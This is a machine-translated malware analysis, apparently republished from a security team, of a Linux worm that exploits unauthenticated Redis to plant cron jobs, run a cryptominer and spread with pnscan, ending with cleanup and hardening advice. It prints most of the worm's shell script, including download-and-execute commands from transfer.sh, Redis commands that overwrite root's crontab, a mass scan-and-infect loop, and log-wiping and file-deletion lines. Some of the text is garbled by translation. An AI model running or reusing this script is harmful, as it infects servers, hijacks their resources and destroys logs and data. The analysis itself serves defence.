Shulou(Shulou.com)05/31 Report--

This article Xiaobian introduces in detail for you "Linux Redis automatic mining infection worm case analysis", the content is detailed, the steps are clear, and the details are handled properly. I hope this "Linux Redis automatic mining infection worm case analysis" article can help you solve your doubts.

I. background

Since the disclosure of the attack method of Redis unauthorized problem to obtain the root authority of Linux system, because of its ease of use, hackers who use this problem to invade Linux services for mining, scanning and so on have been emerging one after another; and in many cases of using this problem to invade servers for underground industry, there is a kind of mining using this problem and will use pnscan scanning to automatically infect other machines. This kind of attack has always existed, but it has shown an increasing trend recently, and it has been captured many times recently, so we make a specific analysis of it.

2. Description of loopholes

First of all, an explanation is made for the exploited vulnerabilities. By default, Redis will be bound to 0.0.0.0Redis 6379. Without the use of a firewall for shielding, the Redis service will be exposed to the public network. If authentication is not enabled, it can cause any user to access Redis and read Redis data without authorization when he can access the target server. Without authorizing access to Redis, an attacker can successfully write his public key to the authotrized_keys file of the ~ / .ssh folder of the target server by using the relevant methods of Redis, and then log in to the target server directly; if the Redis service is started with root authority, you can use this problem to directly obtain server root permission.

After searching in ZoomEye and SHODAN, we can find that many Redis services are open on the public network, and these services may become targets.

Third, intrusion analysis

After analyzing the captured events, we find that the whole intrusion process probably consists of the following steps: 1. Scan the Linux server with open port 6379 (the subsequent infection scanning network segment is 1.0.0.0and16 to 224.255.0.0and16)

2. Try to connect to Redis through redis-cli and execute the command preset in the .dat file to modify the data file of Redis to / var/spool/cron/root, and then write the action of downloading and executing the script to the crontab task by inserting data into Redis.

3. Realize the above related behaviors through the script, complete the implantation and start the mining procedure.

4. Compile and install pnscan, and continue to scan for the next target.

IV. Script analysis

The main functions of the whole intrusion utilization and subsequent infection are based on the Redis script (https://transfer.sh/MIpIA/tmp.9kIguIhkI7)) downloaded and executed in the crontab task. Through the analysis of it, we can basically get all the details of the whole process. This is a base script, and we analyze its related functions through interpretation.

1. Sleep 1

2. Find. -maxdepth 1-name ".mxff0"-type f-mmin + 60-delete

3. [- f. Mxff0] & & exit 0

4. Echo 0 > .mxff0

As long as this part of the code is used as a judgment for repeated execution, the .mxff0 file is used as a tag file, and if the file exists, it means that the script has been executed on the machine and exits directly, otherwise, write the .mxff0 file and proceed to the next step.

5. Trap "rm-rf .m * NaNd tmp.* .r .dat $0" EXIT

Set the preset action to delete related files and script itself after the script exits

6. Setenforce 0 2 > / dev/null

7. Echo SELINUX=disabled > / etc/sysconfig/selinux 2 > / dev/null

8. Crontab-r 2 > / dev/null

9. Rm-rf / var/spool/cron 2 > / dev/null

10. Grep-Q 8.8.8.8 / etc/resolv.conf | | echo "nameserver 8.8.8.8" > > / etc/resolv.conf

11. Rm-rf / tmp/* 2 > / dev/null

12. Rm-rf / var/tmp/* 2 > / dev/null

13. Rm-rf / etc/root.sh 2 > / dev/null

14. Sync & & echo 3 > / proc/sys/vm/drop_caches

15. Cat / dev/null

twenty-nine。 Rm-rf / var/tmp/* 2 > / dev/null

thirty。 Echo 0 > / var/spool/mail/root

thirty-one。 Echo 0 > / var/log/wtmp

thirty-two。 Echo 0 > / var/log/secure

thirty-three。 Echo 0 > / root/.bash_history

Clear relevant login logs and command operation history

thirty-four。 YUM_PACKAGE_NAME= "iptables gcc redis coreutils bash curl wget"

thirty-five。 DEB_PACKAGE_NAME= "coreutils bash build-essential make gcc redis-server redis-tools redis iptables curl"

thirty-six。 If cat / etc/*release | grep-i CentOS; then

thirty-seven。 Yum clean all

thirty-eight。 Yum install-y-Q epel-release

thirty-nine。 Yum install-y-Q $YUM_PACKAGE_NAME

forty。 Elif cat / etc/*release | grep-qi Red; then

forty-one。 Yum clean all

forty-two。 Yum install-y-Q epel-release

forty-three。 Yum install-y-Q $YUM_PACKAGE_NAME

forty-four。 Elif cat / etc/*release | grep-qi Fedora; then

forty-five。 Yum clean all

forty-six。 Yum install-y-Q epel-release

forty-seven。 Yum install-y-Q $YUM_PACKAGE_NAME

forty-eight。 Elif cat / etc/*release | grep-qi Ubuntu; then

forty-nine。 Export DEBIAN_FRONTEND=noninteractive

fifty。 Rm-rf / var/lib/apt/lists/*

fifty-one。 Apt-get update-Q-fix-missing

fifty-two。 For PACKAGE in $DEB_PACKAGE_NAME;do apt-get install-y-Q $PACKAGE; done

fifty-three。 Elif cat / etc/*release | grep-qi Debian; then

fifty-four。 Export DEBIAN_FRONTEND=noninteractive

fifty-five。 Rm-rf / var/lib/apt/lists/*

fifty-six。 Apt-get update-fix-missing

fifty-seven。 For PACKAGE in $DEB_PACKAGE_NAME;do apt-get install-y-Q $PACKAGE; done

fifty-eight。 Elif cat / etc/*release | grep-qi Mint; then

fifty-nine。 Export DEBIAN_FRONTEND=noninteractive

sixty。 Rm-rf / var/lib/apt/lists/*

sixty-one。 Apt-get update-fix-missing

sixty-two。 For PACKAGE in $DEB_PACKAGE_NAME;do apt-get install-y-Q $PACKAGE; done

sixty-three。 Elif cat / etc/*release | grep-qi Knoppix; then

sixty-four。 Export DEBIAN_FRONTEND=noninteractive

sixty-five。 Rm-rf / var/lib/apt/lists/*

sixty-six。 Apt-get update-fix-missing

sixty-seven。 For PACKAGE in $DEB_PACKAGE_NAME;do apt-get install-y-Q $PACKAGE; done

sixty-eight。 Else

sixty-nine。 Exit 1

seventy。 Fi

seventy-one。 Sleep 1

seventy-two。 If! ([- x / usr/local/bin/pnscan] | | [- x / usr/bin/pnscan]); then

seventy-three。 Curl-kLs https://codeload.github.com/ptrrkssn/pnscan/tar.gz/v1.12 > .x112 | | wget-Q-O.x112 https://codeload.github.com/ptrrkssn/pnscan/tar.gz/v1.12

seventy-four。 Sleep 1

seventy-five。 [- f .x112] & & tar xf .x112 & & cd pnscan-1.12 & & make lnx & & make install & & cd. & & rm-rf pnscan-1.12 .x112

seventy-six。 Fi

The main purpose of this long list is to download and compile and install pnscan. From the content, we can see the judgment of different operating systems and then install the relevant modules that depend on it, and then download the source code of pnscan from github for compilation and installation. As for why it is in the form of compilation and installation, the guess is that it is compatible with different systems and the MD5 of the pnscan generated by each compilation is different, so as to avoid the formation of fixed features.

seventy-seven。 Tname=$ (mktemp)

seventy-eight。 OMURL= https://transfer.sh/MIpIA/tmp.vOYTgmtZge

seventy-nine。 Curl-s $OMURL > $tname | | wget-Q-O $tname $OMURL

eighty。 NMURL=$ (curl-s-upload-file $tname https://transfer.sh)

eighty-one。 Mv $tname .gpg & & chmod + x .gpg & &. / .gpg & & rm-rf .gpg

This part mainly downloads the mining program and renames it to .gpg, increases the execution authority, deletes it after execution, and re-uploads it to https://transfer.sh/ to get a new link.

eighty-two。 [- z "$NMURL"] & & NMURL=$OMURL

eighty-three。 Ncmd=$ (basename $(mktemp))

eighty-four。 Sed's |'"$OMURL"'|'"$NMURL"'| g'

< NaNd >

$ncmd

eighty-five。 NSURL=$ (curl-s-upload-file $ncmd https://transfer.sh)

eighty-six。 Echo 'flushall' > .dat

eighty-seven。 Echo 'config set dir / var/spool/cron' > > .dat

eighty-eight。 Echo 'config set dbfilename root' > > .dat

eighty-nine。 Echo 'set Backup1 "tn*/2 * curl-s' ${NSURL}'> NaNd & & bash NaNdnt" > > .dat

ninety。 Echo 'set Backup2 "tn*/5 * wget-O NaNd' ${NSURL}'& & bash NaNdnt" > .dat

ninety-one。 Echo 'set Backup3 "tn*/10 * lynx-source' ${NSURL}'> NaNd & & bash NaNdnt" > > .dat

ninety-two。 Echo 'save' > > .dat

ninety-three。 Echo 'config set dir / var/spool/cron/crontabs' > > .dat

ninety-four。 Echo 'save' > > .dat

ninety-five。 Echo 'exit' > > .dat

The main purpose of this part is to generate a new .dat file, which contains replacing the download address of the Li mining program in the original NaNd script with the new address obtained by uploading it to https://transfer.sh/ in the previous step, as well as the related statements used by Redis.

ninety-six。 Pnx=pnscan

ninety-seven。 [- x / usr/local/bin/pnscan] & & pnx=/usr/local/bin/pnscan

ninety-eight。 [- x / usr/bin/pnscan] & & pnx=/usr/bin/pnscan

ninety-nine。 For x in $(seq 1224 | sort-R); do

one hundred。 For y in $(seq 0255 | sort-R); do

one hundred and one。 $pnx-t512-R'6f 73 3a 4c 69 6e 75 78'- W '2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a'$x.$y.0.0/16 6379 > .r. $x.$y.o

one hundred and two。 Awk'/ Linux/ {print $1, $3}'.r. $x.$y.o > .r. $x.$y.l

one hundred and three。 While read-r h p; do

one hundred and four。 Cat .dat | redis-cli-h $h-p $p-raw &

one hundred and five。 Done

< .r.$x.$y.l 　　106. done 　　107. done 　　而步主要是调用pnscan去扫描子网段1.0.0.0/16到224.255.0.0/16中开放6379端口并且操作系统为Linux的目标，然后利用redis-cli执行.dat中的命令，进行下个目标的感染;这里pnscan的-W参数值'2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a'转换后内容'*1rn$4rnINFOrn'，是向目标Redis服务发送请求获取Redis服务器的各种信息和统计数值，再通过-R参数值'6f 73 3a 4c 69 6e 75 78′(转换后内容为os:Linux)判断是否Linux系统。 　　108. echo 0 >

/ var/spool/mail/root 2 > / dev/null

one hundred and nine。 Echo 0 > / var/log/wtmp 2 > / dev/null

one hundred and ten。 Echo 0 > / var/log/secure 2 > / dev/null

one hundred and eleven。 Echo 0 > / root/.bash_history 2 > / dev/null

one hundred and twelve。 Exit 0

Finally, there is the closing work, clearing the relevant logs and command execution history, and when the script exits, it will trigger the action preset by the script at the beginning with trap, delete the relevant files and the script itself (rm-rf m * NaNd tmp.*. R. Dat $0).

Through the interpretation of the script, we have basically understood the behavior and intrusion process of the entire worm, that is, the process we began to describe.

In addition, by reading the script, we find that although the whole intrusion process is not very complicated, the script actually has a lot of "engineering" details to consider, which makes people marvel at the intruder's "thoughtfulness":

1. Use .mxff0 file to check repeated execution to avoid repeated execution of scripts.

2. In order to increase success, the pretreatment of some environments:

A) close SELINUX

B) add 8.8.8.8 DNS

C) clear the tmp directory

D) clear the system cache

E) modify system resource limits

3. Trace removal

A) use the trap preset action to delete the related files and the script itself after the script has been executed

B) repeatedly clear logs such as related logins and command execution history

4. Peer prevention

A) use iptables to prevent Redis services from being opened on the public network, resulting in re-intrusion

B) remove intrusions that may be left over by peers, kill-related processes

5. System compatibility

A) judge the operating system, execute relevant commands and install dependency packages to maximize the success rate of pnscan compilation and installation

B) close SELINUX, through setenforce and modification / etc/sysconfig/selinux

C) write the task of downloading and executing the script in Crontab, which is realized by curl, wget and lynx

D) Pnscan scanning increases operating system judgment and reduces unnecessary infection attempts

6. Feature removal, survival and continuation

A) Pnscan adopts installation and compilation, which not only improves the compatibility under different systems, but also avoids the formation of fixed MD5 features.

B) using https://transfer.sh transit, new connections are generated for each infection to avoid fixed links forming fixed features

C) the relevant files downloaded to the system use randomly generated file names

It is precisely because of all kinds of "thoughtfulness" of the intruder that the success rate of his invasion and infection can reach a certain level.

V. Safety recommendations

Virus cleanup and system recovery

We can mainly refer to the relevant behaviors of the script for behavior recovery and deletion:

1. Close SELINUX and restart SELINUX according to the original system environment and business needs.

2. Clear / var/spool/cron and restore according to the original backup

3. Modify / etc/resolv.conf to add DNS service 8.8.8.8. If there is no impact, you can not deal with it, or delete it.

4. The system resource limit (/ etc/security/limits.conf) has been modified and can be restored according to the backup situation.

5. The Iptables rule for port 6379 has been added. If it does not affect the business, it is recommended to keep it.

6. Kill provides relevant processes to check whether the processes required by the business are included, and resume them according to the situation.

7. Relevant packages have been installed. The details are listed above, which can be deleted according to the situation or retained if there is no impact.

8. Pnscan is compiled and installed, and / usr/local/bin/pnscan can be deleted

9. Clear the relevant logs and tmp directories, which has no impact on the system and can be ignored.

10. Start the mining process and pnscan scan for infection, process: .gpg, pnscan, direct kill

Some intermediate files are also included. Although the script contains relevant deletion operations, it is recommended to find and confirm globally: .mxff0, .x112, .gpg, .dat, NaNd, .r.xx.xx.o / l, tmp.xxxx

Redis service hardening

1. If it is not necessary, modify the bind entry. Do not bind Redis to 0.0.0.0 to avoid opening the Redis service on the public network. You can restrict access to sources through iptables or Tencent Cloud users through security groups.

2. Do not start the Redis service with root without affecting the business, and it is recommended to modify the default port 6379. Most intrusions aimed at Redis unauthorized problems are aimed at the default port.

3. Configure AUTH and add password verification, so that even if it is open on the public network, if it is not a weak password, hackers cannot access the Redis service for related operations.

4. Use rename-command CONFIG "RENAME_CONFIG" to rename relevant commands, so that hackers can only obtain relevant data without knowing the command, even if they are not authorized to connect to the Redis service, but cannot make further use of it.

After reading this, the article "case Analysis of Linux Redis automatic Mining infected worms" has been introduced. If you want to master the knowledge points of this article, you still need to practice and use it yourself. If you want to know more about related articles, welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.